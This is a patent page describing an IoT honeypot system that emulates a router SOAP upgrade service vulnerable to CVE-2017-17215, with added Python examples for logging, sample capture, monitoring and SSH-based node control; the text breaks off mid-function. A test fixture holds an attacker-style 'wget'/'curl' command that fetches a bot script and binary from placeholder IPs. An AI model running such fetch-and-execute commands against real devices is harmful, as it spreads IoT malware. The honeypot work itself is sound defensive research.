CN110391937B - An IoT Honeynet System Based on SOAP Service Simulation - Google Patents


Info

Publication number: CN110391937B
Authority: CN (China)
Prior art keywords: honeypot, soap, service, function, log
Legal status: Active
Application number: CN201910680597.1A
Other languages: Chinese (zh)
Other versions: CN110391937A (en)
Inventors: 张伟哲, 何慧, 方滨兴, 王焕然, 丁泽宇
Current assignee: Harbin Institute of Technology Shenzhen
Original assignee: Harbin Institute of Technology Shenzhen

Timeline:
Application filed by Harbin Institute of Technology Shenzhen
Priority to CN201910680597.1A
Publication of CN110391937A
Application granted
Publication of CN110391937B
Legal status: Active (current)


Abstract

An IoT honeynet system based on SOAP service simulation belongs to the technical field of IoT security. The purpose of the invention is to monitor and collect the security state of the Internet of Things, capture hackers' malicious requests against the Internet of Things, and collect malicious samples. The invention designs a medium-high interaction honeypot around the router SOAP service vulnerability CVE-2017-17215. To prevent hackers from exploiting unimplemented details of the simulated service with injection that leaves the simulated-service honeypot unable to respond, and therefore unable to capture the subsequent malicious code and samples, a honeypot that provides a real SOAP service is built from vulnerable device firmware to supplement the simulated-service honeypot. To capture more types of SOAP attacks, the SOAP ports most exposed in 2018 are analyzed and a corresponding multi-port honeypot is built. These honeypots are deployed to multiple nodes, a control center is designed to distribute commands and transfer files, and Docker packaging is used for rapid deployment. Hackers cannot control IoT devices through the SOAP service vulnerability, which improves the security of the Internet of Things.

Description

Internet of things honey net system based on SOAP service simulation
Technical Field
The invention relates to an Internet of Things honeynet system based on SOAP service simulation and belongs to the technical field of Internet of Things security.
Background
In recent years, driven by demand for intelligent living, the Internet of Things industry has developed rapidly, and surveys put the number of IoT devices in the billions. Although this huge number of IoT devices can greatly improve people's living environment, it also hides serious security risks. IoT devices are hard to protect with conventional network security measures because of limited device resources, diverse operating systems and architectures, and similar constraints, so they are easy to attack. On the one hand, a hacker can use IoT devices to steal information or carry out malicious attacks, such as breaking into a camera to obtain video or switching smart devices on and off; on the other hand, attackers write malware that uses IoT vulnerabilities to infect IoT devices, posing serious threats to the information and property security of countries, enterprises and individuals. The Internet of Things has clearly become a new hunting ground for hackers, and attention must be paid to IoT security so that hidden risks are discovered and eliminated in time.
To protect the security of the Internet of Things, its malicious behavior must be monitored and threats discovered in time. We need to know what the malicious behavior is, what characteristics the data has, and what the attack types and their features are. This first requires obtaining IoT malicious samples, and honeypot technology is the best method for capturing malicious requests and collecting malicious samples. IoT devices follow the UPnP architecture and are controlled through the SOAP protocol, so many hackers control IoT devices through SOAP service vulnerabilities and damage IoT security. However, prior-art honeynet systems were developed for traditional Internet systems and cannot be applied directly to the IoT field.
Disclosure of Invention
The technical problem to be solved by the invention is as follows:
The invention provides an Internet of Things honeynet system based on SOAP service simulation, which is used to monitor and collect the security state of the Internet of Things, capture hackers' malicious requests against the Internet of Things, and collect malicious samples.
The technical scheme adopted by the invention to solve this problem is as follows:
An Internet of Things honeynet system based on SOAP service simulation comprises three types of honeypots: a simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability, a real SOAP service honeypot built from device firmware containing the CVE-2017-17215 vulnerability, and a multi-port simulated SOAP service honeypot.
After each honeypot is packaged with Docker, the honeynet deploys honeypots to multiple physical nodes, with 1-3 honeypots of different types on each physical node; each physical node (server) supports both single-honeypot and multi-honeypot deployment, and each physical node also runs a main control program that manages the honeypots on that node.
The control node manages and interacts with each physical node (honeynet node), so that honeypots that are otherwise independent are combined into an integral honeynet system.
Because the simulation detail of the simulated SOAP service honeypot is limited, when it receives a SOAP service request that it cannot parse and process, the request is forwarded to the real SOAP service honeypot built from device firmware containing the CVE-2017-17215 vulnerability for processing.
A script at the control node distributes commands and transfers files, acquires the honeypots' response messages and records them in an output log. The control script is written in multithreaded Python and uses the paramiko library to connect to the remote hosts in an IP list; the script transfers files, connects to the hosts with an SSH key and executes a given command, which is how honeypots are switched and the host systems are monitored.
Further, the CVE-2017-17215 vulnerability on which the simulated SOAP service honeypot is based refers to the following: HG532 series routers provide an insecure SOAP service for device upgrades, resulting in unauthorized access and remote code injection; using this vulnerability, a specially constructed request packet sent to port 37215, on which the router's UPnP service listens, leads to remote execution of arbitrary commands.
The CVE-2017-17215 vulnerability information is as follows:
The port occupied by the vulnerability is: 37215
The request path of the vulnerability is: /ctrlt/DeviceUpgrade_1
Affected device models include: b660, HG231f, HG531sV1, HG531V1, HG630, YAbox.
Further, the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability comprises four main modules: the honeypot core module, the honeypot daemon class, the honeypot daemon service and the honeypot monitor.
The honeypot core module, pot_core, is the core service program of the honeypot and provides the simulated vulnerable IoT service. It comprises the SOAP service module soap_server, the web service module webhook, the log module log_server and the malicious sample processing module samples_deal.
The SOAP service module provides the external interface function start_honeypot for the honeypot daemon class, the honeypot daemon service and the honeypot monitor; this function opens the log server and the SOAP server for listening, and sets a timer that calls the timer_handle_log_fun function of the log module log_server. The SOAP service module soap_server calls the handler defined in the web service module webhook together with the make_server function of the wsgiref.simple_server library, and opens a SOAP server on port 37215 to simulate the vulnerable SOAP service of a real IoT device so as to attract hackers to attack.
The log module log_server defines a UDPHandler that listens for request information sent by the SOAP service module soap_server in JSON format, parses it and returns a message confirming that the log was recorded. If the request is found to download a malicious sample, the wget_virus_in_url function of the malicious sample processing module samples_deal is called to download the sample. The log types in the log module log_server are divided into get, post and other, and the log format is shown in the following table:
(Log format table: shown as an image in the original, not reproduced here.)
A handler function for the SOAP vulnerability is defined in the web service module webhook, and a constructed fake file is returned through WSGI. For the CVE-2017-17215 vulnerability, the injected code accesses port 37215 of the web service with the path /ctrlt/DeviceUpgrade_1; the banner information is shown in the CVE-2017-17215 vulnerability banner format table. A send_log function is also defined in the web service module webhook and is used to send request records packaged in JSON format to log_server. The web service module webhook uses a socket to communicate with the log server, waits for the returned message, retransmits if an error message is received, and considers the server down if the number of retransmissions exceeds the limit.
The CVE-2017-17215 banner format is as follows:
(CVE-2017-17215 vulnerability banner format table: shown as an image in the original, not reproduced here.)
The malicious sample processing module samples_deal is responsible for downloading and processing malicious samples. The wget_virus_in_url function provides the externally callable interface to the sample download function; inside it, the download elements are extracted with a regular expression. After the download resource information has been extracted, the download_virus_by_requests function is called to download the sample. That function first searches the output directory for the sample name and, if the name already exists, calls the rename_duplicate_virus function to rename the sample by adding a suffix; it then calls the requests library to download the sample. If the sample is downloaded successfully, the deep_analyze function is called for deeper analysis, that is, the sample content is analyzed line by line to judge whether a 'small horse downloads big horse' pattern exists (a small dropper that fetches a larger payload). The malicious sample processing module samples_deal also defines a clear_duplicate_sample function, which calls an md5sum function to compute the sample's hash value and so removes duplicate samples.
These parts cooperate with each other to form the honeypot core, complete the most basic functions of the honeypot, and simulate real IoT devices and services.
The honeypot daemon class defines a honeypot daemon base class Daemon and provides an interface for controlling honeypots through class instances. The daemonize function of the honeypot daemon class initializes a Daemon instance: it first checks for a duplicate instance through the pidfile, then flushes the buffers, discards the standard streams, and finally registers an atexit hook to ensure that the pidfile is removed when the process ends. The static function __sigterm_handler raises a SystemExit exception; the start function calls the daemonize function to initialize, catches runtime exceptions and outputs error information; the stop function reads the process number from the pidfile and kills that process; the restart function calls the stop function and then the start function to complete a restart.
The honeypot daemon service defines a MyDaemon class that inherits from the Daemon class and calls the core_service.start_honeypot function to start the honeypot core service when the instance runs. In the main function, a MyDaemon instance is created, and the start of the honeypot daemon process and honeypot core is controlled through the start, stop and restart functions of the instance. A PotCore class is further defined in the code to provide the daemon's interface to the outside; it calls the main function through a subprocess call. That is, external code does not call the MyDaemon instance directly but calls the PotCore instance, and the PotCore instance calls the MyDaemon instance through its own method, realizing indirect calling.
The honeypot monitor (pot_monitor) calls the timer_handle_web_detect_fun function to check the honeypot's functionality. The function regularly accesses the honeypot's simulated service, detects its running state, judges abnormalities such as timeouts and connection errors, and calls a PotCore object to restart the honeypot when an abnormality occurs.
Further, the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability further includes:
a JSON configuration file that defines the following parameters: honeypot name, log output directory, honeypot core, honeypot self-check delay and self-check period;
a shell script (.sh) that calls the tc tool to limit traffic and prevent the honeypot, once compromised, from being used for DDoS attacks; and a Python script (.py), called main in this program, which is the outermost entry to the honeypot.
Further, the usage scenario of the real SOAP service honeypot built from device firmware containing the CVE-2017-17215 vulnerability is as follows:
when a request cannot be processed by the simulated protocol, the attacker does not receive the expected response and is likely to drop the connection, so the honeypot cannot capture the subsequent injected code and malicious samples; therefore a honeypot built from the complete real firmware of the vulnerable IoT device is used to process the requests that the simulated honeypot cannot handle.
The real SOAP service honeypot uses a qemu environment to assemble the kernel file vmlinux-2.6.32-5-4kc-malta and the disk image debian_squeeze_mips_standard.qcow2; after it starts successfully, it switches the root directory with a chroot /root/squashfs-root /bin/sh command and runs the upnp service and the mic service, thereby providing exactly the same SOAP service as the real vulnerable IoT device. The real SOAP service honeypot includes the log module log_server and the malicious sample processing module samples_deal of the honeypot core module.
Further, the multi-port simulated SOAP service honeypot is developed according to the SOAP ports most exposed on IoT devices in 2018; the SOAP port information is as follows:
(SOAP port information table: shown as an image in the original, not reproduced here.)
The function of the core module of the multi-port simulated SOAP service honeypot is the same as that of the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability; the difference is that the multi-port simulated SOAP service honeypot is a multi-port honeypot, and the threading module is used in the code to run multiple threads.
Further, the Docker packaging adopted by the honeynet system comprises the following operations:
1) optimizing the base image: Ubuntu 16.04 is used as the base image of the honeypot, and the Python 3.6 environment and the dependency packages needed by the code are integrated into it, so that slow image downloads during packaging are avoided;
2) chaining Dockerfile instructions: multiple commands are chained into a single RUN instruction, which reduces the number of image layers, and unnecessary components are deleted to save space;
3) optimizing the build: the image cache is used fully, a fixed machine is used for docker build, and the rarely-changing large dependency libraries are separated from the frequently-modified in-house code;
4) optimizing RUN commands: when executing apt commands, several packages are installed in one chained command, and the --no-install-recommends option can be used to avoid installing recommended-only dependencies.
The invention has the following beneficial technical effects:
The invention designs a medium-high interaction honeypot around the router SOAP service vulnerability CVE-2017-17215. To prevent hackers from exploiting unimplemented details of the simulated service with injection that leaves the simulated-service honeypot unable to respond, and therefore unable to capture the subsequent malicious code and samples, vulnerable device firmware is used to provide a real SOAP service that supplements the simulated-service honeypot. To capture more types of SOAP attacks, the SOAP ports most exposed in 2018 are analyzed and corresponding multi-port honeypots are built. The honeypots are deployed to multiple nodes, a control center is designed to distribute commands and transfer files, and Docker packaging is used for rapid deployment, which realizes the Internet of Things honeynet system based on SOAP service simulation. A hacker cannot control IoT devices through the SOAP service vulnerability, and the security of the Internet of Things is improved.
Drawings
FIG. 1 is a block diagram of the collaboration relationships among the parts of pot_core;
FIG. 2 is a block diagram of the overall structure of the Internet of Things honeynet system based on SOAP service simulation (composite honeynet architecture).
Detailed Description
The implementation of the Internet of Things honeynet system based on SOAP service simulation according to the present invention is described below with reference to FIGS. 1-2 and the tables:
1. Simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability
The HG532 family of routers provides an insecure SOAP service for device upgrades, resulting in unauthorized access and remote code injection. With this vulnerability, arbitrary commands can be executed remotely by sending a specially constructed request packet to port 37215, on which the router's UPnP service listens.
The models of IoT devices affected by the vulnerability and their configuration information are shown in Table 1:
TABLE 1 CVE-2017-17215 vulnerability information
(Table 1: shown as an image in the original, not reproduced here.)
The outermost layer of the honeypot's overall structure is an intelligent daemon framework consisting of four main modules: the honeypot core module, the honeypot daemon class, the honeypot daemon service and the honeypot monitor. The framework ensures the stability of the honeypot's operation, discovers and restarts honeypot services promptly when they become abnormal, and supplements log information that the honeypot services themselves cannot record, which assists debugging and troubleshooting.
The function and implementation of the honeypot are described below module by module.
Honey pot core module
The pot_core module is the core service program of the honeypot and provides the simulated vulnerable IoT device and service. It is further divided into the SOAP service module soap_server, the web service module webhook, the log module log_server and the malicious sample processing module samples_deal. The relationship between the parts is shown in FIG. 1.
core_service.py provides the external interface function start_honeypot for modules outside pot_core: it opens the log server and the SOAP server for listening and sets a timer that calls the timer_handle_log_fun function of log_server.py; that function re-arms itself recursively, checks the current time, and ensures that all stored logs are written out to a local directory every day.
log_server.py defines a UDPHandler that listens for request information sent by the front-end soap_server.py in JSON format, parses it and returns a message that logging succeeded. If a malicious sample download is found in the request, the wget_virus_in_url function of samples_deal.py is called to download the sample. The file also provides core_service with interface functions for starting the log server and writing the log to a file at regular intervals. The log types defined in this part are divided into get, post and other, and the log format is shown in Table 2:
Table 2 log format
(Table 2: shown as an image in the original, not reproduced here.)
soap_server.py calls the handler defined in webhook.py and the make_server function of wsgiref.simple_server, and starts a SOAP server on port 37215 to simulate the vulnerable SOAP service of a real IoT device so as to attract hackers to attack.
webhook.py defines the handler function for the SOAP vulnerability and returns the constructed dummy file through WSGI. For the CVE-2017-17215 vulnerability, the injected code accesses port 37215 of the web service with the path /ctrlt/DeviceUpgrade_1, and the banner information is as shown in Table 3. This part also defines the send_log function for sending request records packed in JSON format to the log server. It uses a socket to communicate with the log server, waits for the message returned by the log server, retransmits if an error message is received, and considers the server down if the number of retransmissions exceeds the limit.
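To make the soap_server / webhook / log_server exchange concrete, the block below is an added example (not the patent's code) of a WSGI front end that logs every request to a UDP log server with ack-and-retry; the names soap_app, send_log, LogUDPHandler, simulate_request, UPGRADE_PATH and the device XML are assumptions of this example, not identifiers from the patent.

```python
import io
import json
import socket
import socketserver
import threading
from wsgiref.simple_server import make_server

# Constructed stand-in for the device description the honeypot answers a SOAP
# scan with; the real honeypot loads this from its SOAP XML folder.
DEVICE_XML = (b'<?xml version="1.0"?><root><device>'
              b'<modelName>constructed-sample-model</modelName></device></root>')
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"   # vulnerable upgrade endpoint named in the patent
RECORDS = []                              # records the log server has accepted


class LogUDPHandler(socketserver.BaseRequestHandler):
    """log_server-style handler: parse one JSON record, store it, ack or nack."""

    def handle(self):
        data, sock = self.request
        try:
            rec = json.loads(data.decode("utf-8"))
            if not isinstance(rec, dict) or not {"type", "path", "peer"} <= set(rec):
                raise ValueError("missing fields")
            RECORDS.append(rec)
            sock.sendto(b"ok", self.client_address)
        except (ValueError, UnicodeDecodeError):
            sock.sendto(b"error", self.client_address)


def start_log_server(host="127.0.0.1", port=0):
    """Run the UDP log server in a daemon thread; returns (server, bound port)."""
    srv = socketserver.UDPServer((host, port), LogUDPHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def send_log(record, log_addr, retries=3, timeout=1.0):
    """webhook-style sender: ship the JSON record over UDP, wait for 'ok',
    retransmit on 'error' or timeout, give up (server down) after `retries`."""
    payload = json.dumps(record).encode("utf-8")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for _ in range(retries):
            s.sendto(payload, log_addr)
            try:
                reply, _ = s.recvfrom(64)
            except socket.timeout:
                continue
            if reply == b"ok":
                return True
    return False


def classify(method):
    """Log type as the patent divides it: get, post or other."""
    return method.lower() if method in ("GET", "POST") else "other"


def make_soap_app(log_addr):
    """WSGI app: every request is logged; GETs get the device XML, POSTs to the
    upgrade path get a canned SOAP reply (nothing from the body is executed)."""
    def app(environ, start_response):
        method = environ["REQUEST_METHOD"]
        path = environ.get("PATH_INFO", "")
        try:
            length = int(environ.get("CONTENT_LENGTH") or 0)
        except ValueError:
            length = 0
        body = environ["wsgi.input"].read(length).decode("utf-8", "replace") if length else ""
        record = {"type": classify(method), "path": path,
                  "peer": environ.get("REMOTE_ADDR", ""), "body": body[:4096]}
        send_log(record, log_addr)   # ack, retry and give-up handled inside
        start_response("200 OK", [("Content-Type", "text/xml")])
        if method == "POST" and path == UPGRADE_PATH:
            return [b"<s:Envelope/>"]
        return [DEVICE_XML]
    return app


def simulate_request(app, method, path, body=b"", peer="198.51.100.7"):
    """Drive the app without a network listener; returns (status, response bytes)."""
    env = {"REQUEST_METHOD": method, "PATH_INFO": path, "REMOTE_ADDR": peer,
           "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
    status = []
    out = b"".join(app(env, lambda s, headers: status.append(s)))
    return status[0], out


if __name__ == "__main__":   # stand-alone: log server plus SOAP front end on 37215
    _, log_port = start_log_server()
    make_server("0.0.0.0", 37215, make_soap_app(("127.0.0.1", log_port))).serve_forever()
```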
samples_deal.py is responsible for downloading and processing malicious samples. Its wget_virus_in_url function provides the externally callable interface to the sample download function; inside it, the download elements are extracted with regular expressions.
After the download resource information has been extracted, the download_virus_by_requests function is called to download the samples. That function first searches the output directory for the sample name and, if the name already exists, calls the rename_duplicate_virus function to rename the sample by adding a suffix. It then calls the requests library to download the sample. If the sample is downloaded successfully, deeper analysis is carried out by calling the deep_analyze function, that is, the sample content is analyzed line by line to judge whether a 'small horse downloads big horse' pattern exists (a small dropper that fetches a larger payload). This part also defines the clear_duplicate_sample function, which deduplicates samples by calling the md5sum function to compute each sample's hash value.
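As an added example (not the patent's code) of what samples_deal does, the block below extracts fetch URLs from a captured request with a regular expression, stores samples with rename-on-clash, deduplicates by md5 and runs the line-by-line dropper check; the function names, both regular expressions, the constructed request and the injected fetch callback are assumptions so that it runs offline.

```python
import hashlib
import os
import re
import tempfile
from urllib.parse import urlparse

# Assumed pattern for the URL argument of a wget/curl fetch inside a captured command.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|&\n]*?(https?://[^\s'\"<>;|&]+)")
# Assumed pattern for lines of a downloaded script that themselves fetch something:
# the "small horse downloads big horse" (dropper) case the patent checks line by line.
DROPPER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")


def extract_download_urls(request_text):
    """Return the fetch URLs in a captured request body, first-seen order, no repeats."""
    seen, urls = set(), []
    for m in FETCH_RE.finditer(request_text):
        url = m.group(1)
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def is_dropper(sample_bytes):
    """Line-by-line check: does this (text) sample fetch further payloads?"""
    try:
        text = sample_bytes.decode("utf-8")
    except UnicodeDecodeError:
        return False          # binary sample (e.g. an ELF): not a script dropper
    return any(DROPPER_RE.search(line) for line in text.splitlines())


class SampleStore:
    """Stores samples in out_dir: rename on name clash, de-duplicate by md5."""

    def __init__(self, out_dir=None):
        self.out_dir = out_dir or tempfile.mkdtemp(prefix="samples_")
        self.hashes = {}      # md5 hex digest -> stored path

    def _unique_path(self, name):
        base = os.path.join(self.out_dir, os.path.basename(name) or "sample")
        path, n = base, 1
        while os.path.exists(path):   # rename_duplicate_virus: add a numeric suffix
            path = f"{base}.{n}"
            n += 1
        return path

    def save(self, url, fetch):
        """fetch(url) -> bytes is injected (the honeypot uses requests.get there).
        Returns (path, md5, dropper_flag, duplicate_flag)."""
        data = fetch(url)
        digest = hashlib.md5(data).hexdigest()
        if digest in self.hashes:  # clear_duplicate_sample: same content already stored
            return self.hashes[digest], digest, is_dropper(data), True
        path = self._unique_path(urlparse(url).path)
        with open(path, "wb") as f:
            f.write(data)
        self.hashes[digest] = path
        return path, digest, is_dropper(data), False


def process_request(request_text, fetch, store=None):
    """wget_virus_in_url-style entry point: extract URLs, store each sample, report."""
    store = store or SampleStore()
    return [store.save(url, fetch) for url in extract_download_urls(request_text)]


# Constructed sample input: a captured command string and what its URLs would return.
SAMPLE_REQUEST = ("cd /tmp; wget http://203.0.113.5/bot.sh; wget http://203.0.113.5/bot.sh; "
                  "curl http://203.0.113.9/x.mips -o x")
FAKE_CONTENT = {
    "http://203.0.113.5/bot.sh": b"#!/bin/sh\ncd /tmp\nwget http://203.0.113.5/bot.mips\n",
    "http://203.0.113.9/x.mips": b"\x7fELF\xff\xfe\x00constructed-binary",
}
```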
TABLE 3 CVE-2017-17215 vulnerability banner format
(Table 3: shown as an image in the original, not reproduced here.)
The SOAP XML folder stores the SOAP device information given in imitation of the vulnerable router, including the device type, device model, device website, uuid, service list, service address, serial number and so on. This file is used to return realistic device configuration information in response to a SOAP service scan of port 37215.
These parts cooperate with each other to form the honeypot core, complete the most basic functions of the honeypot, and simulate real IoT devices and services.
Honeypot daemon class
This class defines the honeypot daemon base class Daemon, which has start, stop, restart and initialization methods and provides the outside with an interface for controlling honeypots through class instances.
Because a Daemon instance is a daemon process detached from the terminal, its standard streams are redirected to an empty file through the os.dup2 function. The pidfile attribute defaults to "/tmp.pid"; this file stores the process number of the current process, and whether the process exists can be determined from the file, which guarantees a single instance.
The daemonize function initializes a Daemon instance: it first checks for a duplicate instance through the pidfile, then flushes the buffers, discards the standard streams, and finally registers an atexit hook to ensure that the pidfile is removed when the process ends. The static function __sigterm_handler raises a SystemExit exception. The start function calls daemonize to initialize, catches runtime exceptions and outputs error information. The stop function reads the process number from the pidfile and kills it. The restart function calls the stop function and then the start function to complete a restart.
Honeypot daemon service
The daemon service script (.py) defines a class MyDaemon that inherits from the Daemon class in scar_library and calls the core_service.start_honeypot function to start the honeypot core service when the instance runs. In the main function, a MyDaemon instance is created, and the start of the honeypot daemon and the honeypot core is controlled through the instance's start, stop and restart functions. A class PotCore is also defined in the code to provide the daemon's interface to the outside; it calls the main function through a subprocess call. That is, external code does not call the MyDaemon instance directly but calls the PotCore instance, and the PotCore instance calls the MyDaemon instance through its own method, realizing indirect calling.
Honeypot monitor
pot_monitor calls the timer_handle_web_detect_fun function to check the honeypot's functionality. The function regularly accesses the honeypot's simulated service, detects its running state, judges abnormalities such as timeouts and connection errors, and calls a PotCore object to restart the honeypot when an abnormality occurs. It also provides a start_service interface for external calls.
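The pidfile singleton check of the Daemon class and the pot_monitor self-check above, as an added example that is not the patent's code: probe_service classifies one probe as ok, timeout, connect_error or bad_status, Monitor restarts through a callback (standing in for PotCore.restart) on any abnormality, and pid_is_alive is the pidfile test; the names, the stand-in HTTP service and the helpers write_pidfile, start_fake_service and closed_port are assumptions of this example.

```python
import errno
import os
import socket
import tempfile
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def write_pidfile(path=None, pid=None):
    """Daemon-style pidfile: record our pid (or a given one); returns the path."""
    if path is None:
        fd, path = tempfile.mkstemp(suffix=".pid")
        os.close(fd)
    with open(path, "w") as f:
        f.write(str(pid if pid is not None else os.getpid()))
    return path


def pid_is_alive(pidfile):
    """Singleton check like Daemon.daemonize: is the pid in the file still running?"""
    try:
        with open(pidfile) as f:
            pid = int(f.read().strip() or 0)
    except (OSError, ValueError):
        return False
    if pid <= 0:
        return False
    try:
        os.kill(pid, 0)        # signal 0 probes existence without affecting the process
    except OSError as e:
        return e.errno == errno.EPERM   # exists but belongs to another user
    return True


def probe_service(url, timeout=2.0):
    """One check of the simulated service: 'ok', 'timeout', 'connect_error' or 'bad_status'."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return "ok" if resp.status == 200 else "bad_status"
    except urllib.error.HTTPError:
        return "bad_status"
    except OSError as e:               # URLError, refused connections and timeouts
        reason = getattr(e, "reason", e)
        if isinstance(reason, (socket.timeout, TimeoutError)):
            return "timeout"
        return "connect_error"


class Monitor:
    """pot_monitor-style self-check: probe periodically, restart on abnormality."""

    def __init__(self, url, restart_cb, period=60.0):
        self.url, self.restart_cb, self.period = url, restart_cb, period
        self.history = []          # every probe result, newest last

    def check_once(self):
        status = probe_service(self.url)
        self.history.append(status)
        if status != "ok":
            self.restart_cb(status)   # in the honeypot: PotCore restart
        return status

    def run_forever(self):
        """Re-arm with threading.Timer, as the patent's timer_handle_* functions do."""
        self.check_once()
        threading.Timer(self.period, self.run_forever).start()


class _OkHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the simulated SOAP service: answers 200 to any GET."""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"<root/>")

    def log_message(self, *args):
        pass                       # keep the stand-in quiet


def start_fake_service():
    """Start the stand-in service on a free loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _OkHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def closed_port():
    """A loopback port that nothing listens on (bound once, then released)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]
```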
Other modules
A JSON file is the honeypot's configuration file; it defines a number of parameters and reduces the workload of secondary development. Specifically it includes the honeypot name, log output directory, honeypot core, honeypot self-check delay, self-check period and so on.
An entry script (.py) is the entry to the whole honeypot framework: it calls the start method of a PotCore class instance to start the daemon, and then calls the self-check start_service function of pot_monitor to start the SOAP service self-check.
A shell script (.sh) calls the tc tool to limit traffic and prevent the honeypot, once compromised, from being used for DDoS attacks. A Python script (.py), called main in this program, is the outermost entry to the honeypot.
2. SOAP service honeypot based on device firmware
The medium-high interaction honeypot described above simulates the SOAP protocol on top of WSGI; when the simulated protocol cannot process a request, the attacker does not receive the expected response and is likely to drop the connection, so the honeypot cannot capture the subsequent injected code and malicious samples. Therefore, a high-interaction honeypot is built from the complete real firmware of the vulnerable IoT device to process the requests that the simulated honeypot cannot handle. Because its services are complete, the captured malicious sample can even be actually run.
The kernel file vmlinux-2.6.32-5-4kc-malta and the disk image debian_squeeze_mips_standard.qcow2 are assembled in a qemu environment; after a successful start, the root directory is switched with a chroot /root/squashfs-root /bin/sh command, and the upnp service and the mic service are run so as to provide exactly the same SOAP service as the real vulnerable IoT device. The SOAP service honeypot based on device firmware is realized by adding the request recording and sample download modules to this system.
3. SOAP service multi-port honeypot
Through the collection of IoT device information, banner information of multiple IoT devices affected by the vulnerability was obtained; it is used to match device types so as to select the response content for malicious requests. The device information is shown in Table 4.
Table 4 popular SOAP port device information
(Table 4: shown as an image in the original, not reproduced here.)
The design of the daemon framework and the honeypot core module is similar to that of the CVE-2017-17215 honeypot and is not repeated here. The difference is that this honeypot is a multi-port honeypot, so the threading module is used in the code to run multiple threads. Once running, any port can return the IoT device's configuration file according to the given fingerprint information, realizing the simulation of real device services.
4. Honeypot Docker encapsulation
After the honeypot service is realized, in order to facilitate rapid deployment and transplantation and prevent malicious behaviors after the honeypot is broken, the honeypot needs to be virtualized and transplanted, and is packaged into a black box which is easy to use and deploy.
Docker is a technology for packaging applications, and mainly comprises mirror images, containers and warehouses. An image is a file that can be recognized by the Docker engine and contains the basic contents of a container, and an image can contain an operating system and specific environments, applications and the like required by a developer. The container is a mirror image after operation. The repository is used to store the image.
The use of Docker has several advantages:
(1) Honeypots are packaged into Docker images: the honeypot's operating system, program dependencies, simulation services and so on are packed into a black box, no environment needs to be set up when migrating, and only Docker needs to be installed to deploy. Thanks to the repository, transfer time is saved as well: each node pulls the honeypot image from the repository automatically, and multiple nodes work at the same time, so the honeynet system is deployed rapidly.
(2) In practical use, honeypots are often compromised by hackers. Once this happens we not only lose control of the machine, but the hacker uses it for malicious behaviour. Some security measures are therefore necessary so that a hacker cannot compromise the honeypot, or cannot take further control of our host even after compromising it. To keep hackers from compromising the honeypots, medium-to-high interaction honeypots are adopted: the exploitation process is simulated, and requests are received and answered only within a controlled range, which reduces the honeypot's interactivity, so a balance has to be struck. Container technology in turn protects the host: even if a hacker breaks through the honeypot, it is only one container on the physical machine, isolated from the physical machine's resources, and the container can be reset and restored at any time.
(3) Because containers are lightweight, they use few system resources and greatly improve host resource utilization. With container technology several honeypot instances can be deployed on a single host, giving high flexibility.
When packaging the image, the image needs to be kept small for rapid deployment. Specifically:
1. Optimize the base image. ubuntu16.04 is used as the honeypot's base image, with a python3.6 environment and the packages needed by the code integrated into it, so that image downloads do not slow down packaging.
2. Chain Dockerfile instructions. Several commands are chained into one RUN instruction, reducing the number of image layers, and unnecessary components are deleted to save space.
3. Optimize the build. The image cache is fully used, builds are done on a fixed machine, and the large, rarely changing dependency base is kept separate from the frequently modified own code.
4. Optimize the RUN commands. When running apt, several packages are installed in one command, and the --no-install-recommends option avoids pulling in recommended dependencies.
5. Honeypot architecture design
After the honeypots are packaged they must be deployed on physical machines, and control nodes manage and interact with the honeynet nodes, so that independent honeypots are combined into one honeynet system. The overall structure of the IoT honeynet designed by the invention is shown in figure 2.
The honeynet system deploys honeypots to several physical nodes; each physical machine supports single- and multi-honeypot deployment, and each carries a main control program that manages the honeypots on that machine. When the CVE-2017-17215 simulation honeypot cannot parse an external request, the request is sent to the main control node, which tells the high-interaction honeypot running the real firmware to respond.
To give the honeypot system coordination and cluster deployment capability, a control center is designed. A script in the control center distributes files and commands, obtains the honeypots' response messages and records them in an output log. The control script uses python multithreading and the paramiko library to connect to the remote hosts in an ip list. It can transfer files, and it can also connect to a host with ssh keys and execute given commands, to start and stop honeypots, monitor the host system and so on.
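A control-center dispatcher of the kind just described, added here as an example and not the patent's own code: it fans a command out to every host in an ip list from worker threads and records each node's reply in an output log. The ssh_exec/ssh_put helpers (paramiko assumed installed), the container name iot-honeypot and the key path are assumptions; the dispatcher takes its transport as a callable, so it also runs offline with the constructed fake_transport.

```python
import json
import os
import threading
import time
from queue import Empty, Queue

KEY_FILE = os.path.expanduser("~/.ssh/id_ed25519")   # assumed key used for key-based ssh

# Tasks the control script issues to nodes; the container name is a placeholder.
HONEYPOT_COMMANDS = {
    "start": "docker start iot-honeypot",
    "stop": "docker stop iot-honeypot",
    "status": "uptime && docker ps --filter name=iot-honeypot --format '{{.Status}}'",
}


def _ssh_client(host, username, timeout):
    """Open a key-authenticated SSH session; unknown host keys are rejected (paramiko assumed)."""
    import paramiko  # imported lazily so the dispatcher still loads without paramiko
    client = paramiko.SSHClient()
    client.load_system_host_keys()
    client.connect(host, username=username, key_filename=KEY_FILE, timeout=timeout)
    return client


def ssh_exec(host, command, username="root", timeout=10):
    """Run one command on a node; returns (exit status, stdout, stderr)."""
    client = _ssh_client(host, username, timeout)
    try:
        _stdin, stdout, stderr = client.exec_command(command, timeout=timeout)
        rc = stdout.channel.recv_exit_status()
        return rc, stdout.read().decode(errors="replace"), stderr.read().decode(errors="replace")
    finally:
        client.close()


def ssh_put(host, local_path, remote_path, username="root", timeout=10):
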